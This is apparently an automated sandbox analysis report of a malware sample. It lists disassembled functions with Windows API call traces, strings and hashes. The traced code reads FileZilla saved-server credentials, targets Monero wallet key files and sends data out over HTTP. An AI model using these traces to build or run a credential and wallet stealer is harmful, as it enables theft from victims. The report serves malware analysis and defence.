                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 08433f62c14d34ac1d106fcd67894395327e9fe7dad703823113e464eaae46ee
                              • Instruction ID: 1c348c12d7c861878d57c750f0cdc1833f40c4609d2024c9876d77afba710dac
                              • Opcode Fuzzy Hash: 08433f62c14d34ac1d106fcd67894395327e9fe7dad703823113e464eaae46ee
                              • Instruction Fuzzy Hash: FF4157B3E042109BF3141929EC9577ABA9ADB90320F2A463DDA88A7780E97D5C0183C5
                              Function 0060B75D Relevance: .1, Instructions: 114COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 99c3b818f71b267c9a579a4bf73533b808377394ee4089b25b406d9498a62807
                              • Instruction ID: 9869daf6a76aaa0bc6422482783687aa7b6a7d07f6096b0a30c95deeff5c3db3
                              • Opcode Fuzzy Hash: 99c3b818f71b267c9a579a4bf73533b808377394ee4089b25b406d9498a62807
                              • Instruction Fuzzy Hash: C63195F3908210AFE314EF19D88576FBBD5EF94720F06893DEAC997640D2356C508AD2
                              Function 001C9750 Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              Function 001C0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001C8E0B
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001CA7E6
                                • Part of subcall function 001B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001B99EC
                                • Part of subcall function 001B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 001B9A11
                                • Part of subcall function 001B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 001B9A31
                                • Part of subcall function 001B99C0: ReadFile.KERNEL32(000000FF,?,00000000,001B148F,00000000), ref: 001B9A5A
                                • Part of subcall function 001B99C0: LocalFree.KERNEL32(001B148F), ref: 001B9A90
                                • Part of subcall function 001B99C0: CloseHandle.KERNEL32(000000FF), ref: 001B9A9A
                                • Part of subcall function 001C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001C8E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,001D0DBA,001D0DB7,001D0DB6,001D0DB3), ref: 001C0362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C0369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 001C0385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001D0DB2), ref: 001C0393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 001C03CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001D0DB2), ref: 001C03DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 001C0419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001D0DB2), ref: 001C0427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 001C0463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001D0DB2), ref: 001C0475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001D0DB2), ref: 001C0502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001D0DB2), ref: 001C051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001D0DB2), ref: 001C0532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001D0DB2), ref: 001C054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 001C0562
                              • lstrcat.KERNEL32(?,profile: null), ref: 001C0571
                              • lstrcat.KERNEL32(?,url: ), ref: 001C0580
                              • lstrcat.KERNEL32(?,00000000), ref: 001C0593
                              • lstrcat.KERNEL32(?,001D1678), ref: 001C05A2
                              • lstrcat.KERNEL32(?,00000000), ref: 001C05B5
                              • lstrcat.KERNEL32(?,001D167C), ref: 001C05C4
                              • lstrcat.KERNEL32(?,login: ), ref: 001C05D3
                              • lstrcat.KERNEL32(?,00000000), ref: 001C05E6
                              • lstrcat.KERNEL32(?,001D1688), ref: 001C05F5
                              • lstrcat.KERNEL32(?,password: ), ref: 001C0604
                              • lstrcat.KERNEL32(?,00000000), ref: 001C0617
                              • lstrcat.KERNEL32(?,001D1698), ref: 001C0626
                              • lstrcat.KERNEL32(?,001D169C), ref: 001C0635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001D0DB2), ref: 001C068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 1d305c3b9613aff27db20b56f95e236e1bc4767da31645465673d46401ca6ab7
                              • Instruction ID: 5f0d81ccf502ff719872e5b063eb3f403889386cee724a4928a46b8c1ff84350
                              • Opcode Fuzzy Hash: 1d305c3b9613aff27db20b56f95e236e1bc4767da31645465673d46401ca6ab7
                              • Instruction Fuzzy Hash: 0DD10EB1900208ABCB05EBE4DD96FEE7778AF38305F94451DF106A6191DF74EA06CB62
                              Function 001B5960 Relevance: 44.2, APIs: 17, Strings: 8, Instructions: 495networkstringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001CA7E6
                                • Part of subcall function 001B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001B4839
                                • Part of subcall function 001B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 001B4849
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 001B59F8
                              • StrCmpCA.SHLWAPI(?,00EEE498), ref: 001B5A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001B5B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00EEE478,00000000,?,00EE9D30,00000000,?,001D1A1C), ref: 001B5E71
                              • lstrlen.KERNEL32(00000000), ref: 001B5E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 001B5E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001B5E9A
                              • lstrlen.KERNEL32(00000000), ref: 001B5EAF
                              • lstrlen.KERNEL32(00000000), ref: 001B5ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 001B5EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 001B5F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 001B5F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 001B5F4C
                              • InternetCloseHandle.WININET(00000000), ref: 001B5FB0
                              • InternetCloseHandle.WININET(00000000), ref: 001B5FBD
                              • HttpOpenRequestA.WININET(00000000,00EEE448,?,00EED8E8,00000000,00000000,00400100,00000000), ref: 001B5BF8
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                              • InternetCloseHandle.WININET(00000000), ref: 001B5FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------$8$H$x
                              • API String ID: 874700897-67791069
                              • Opcode ID: 05da2054e171ee3f620b41302e16508ca5dd1518fb2849cfe518d2c292a227e3
                              • Instruction ID: c2a63ef5703d311400c6ef89e00a7b6182d2f40af8471dcf78974745ab5448d6
                              • Opcode Fuzzy Hash: 05da2054e171ee3f620b41302e16508ca5dd1518fb2849cfe518d2c292a227e3
                              • Instruction Fuzzy Hash: 2912CC7182011CABDB16EBA0DC96FEEB378BF34705F90419DB10A62191DF70AE49CB65
                              Function 001BCEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                                • Part of subcall function 001C8B60: GetSystemTime.KERNEL32(001D0E1A,00EE99A0,001D05AE,?,?,001B13F9,?,0000001A,001D0E1A,00000000,?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001C8B86
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001BCF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 001BD0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001BD0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 001BD208
                              • lstrcat.KERNEL32(?,001D1478), ref: 001BD217
                              • lstrcat.KERNEL32(?,00000000), ref: 001BD22A
                              • lstrcat.KERNEL32(?,001D147C), ref: 001BD239
                              • lstrcat.KERNEL32(?,00000000), ref: 001BD24C
                              • lstrcat.KERNEL32(?,001D1480), ref: 001BD25B
                              • lstrcat.KERNEL32(?,00000000), ref: 001BD26E
                              • lstrcat.KERNEL32(?,001D1484), ref: 001BD27D
                              • lstrcat.KERNEL32(?,00000000), ref: 001BD290
                              • lstrcat.KERNEL32(?,001D1488), ref: 001BD29F
                              • lstrcat.KERNEL32(?,00000000), ref: 001BD2B2
                              • lstrcat.KERNEL32(?,001D148C), ref: 001BD2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 001BD2D4
                              • lstrcat.KERNEL32(?,001D1490), ref: 001BD2E3
                                • Part of subcall function 001CA820: lstrlen.KERNEL32(001B4F05,?,?,001B4F05,001D0DDE), ref: 001CA82B
                                • Part of subcall function 001CA820: lstrcpy.KERNEL32(001D0DDE,00000000), ref: 001CA885
                              • lstrlen.KERNEL32(?), ref: 001BD32A
                              • lstrlen.KERNEL32(?), ref: 001BD339
                                • Part of subcall function 001CAA70: StrCmpCA.SHLWAPI(00EE8A28,001BA7A7,?,001BA7A7,00EE8A28), ref: 001CAA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 001BD3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: 9445b9870407387db76582d4bfd77cc29e9687976dc87cce1c5a54171a9a214b
                              • Instruction ID: 616a5a73264a5da26c74eb351a148538bf883e9e7a6913af9cf289796ff70bef
                              • Opcode Fuzzy Hash: 9445b9870407387db76582d4bfd77cc29e9687976dc87cce1c5a54171a9a214b
                              • Instruction Fuzzy Hash: D4E1CAB1910108ABCB06EBA0DD96EEE777CBF34305F904159F506A7191DF35EA09CBA2
                              Function 001BC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00EECE48,00000000,?,001D144C,00000000,?,?), ref: 001BCA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 001BCA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 001BCA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 001BCAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 001BCAD9
                              • StrStrA.SHLWAPI(?,00EECE00,001D0B52), ref: 001BCAF7
                              • StrStrA.SHLWAPI(00000000,00EECE60), ref: 001BCB1E
                              • StrStrA.SHLWAPI(?,00EED480,00000000,?,001D1458,00000000,?,00000000,00000000,?,00EE8A98,00000000,?,001D1454,00000000,?), ref: 001BCCA2
                              • StrStrA.SHLWAPI(00000000,00EED680), ref: 001BCCB9
                                • Part of subcall function 001BC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 001BC871
                                • Part of subcall function 001BC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 001BC87C
                              • StrStrA.SHLWAPI(?,00EED680,00000000,?,001D145C,00000000,?,00000000,00EE8B28), ref: 001BCD5A
                              • StrStrA.SHLWAPI(00000000,00EE88E8), ref: 001BCD71
                                • Part of subcall function 001BC820: lstrcat.KERNEL32(?,001D0B46), ref: 001BC943
                                • Part of subcall function 001BC820: lstrcat.KERNEL32(?,001D0B47), ref: 001BC957
                                • Part of subcall function 001BC820: lstrcat.KERNEL32(?,001D0B4E), ref: 001BC978
                              • lstrlen.KERNEL32(00000000), ref: 001BCE44
                              • CloseHandle.KERNEL32(00000000), ref: 001BCE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 512a7507a0af05d5b54677b28feb2c9a9179acdd81866e509fbeb98467656c45
                              • Instruction ID: f02bbe4e41e29e20df2ae187c025bd0f3fe5a4d5f60a577288fa6945ffd82f70
                              • Opcode Fuzzy Hash: 512a7507a0af05d5b54677b28feb2c9a9179acdd81866e509fbeb98467656c45
                              • Instruction Fuzzy Hash: EDE1DFB191010CABDB16EBA4DC96FEEB778AF34305F80415DF10667191DF30AA4ACB66
                              Function 001C8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                              • RegOpenKeyExA.ADVAPI32(00000000,00EEADC8,00000000,00020019,00000000,001D05B6), ref: 001C83A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 001C8426
                              • wsprintfA.USER32 ref: 001C8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 001C847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 001C848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 001C8499
                                • Part of subcall function 001CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001CA7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
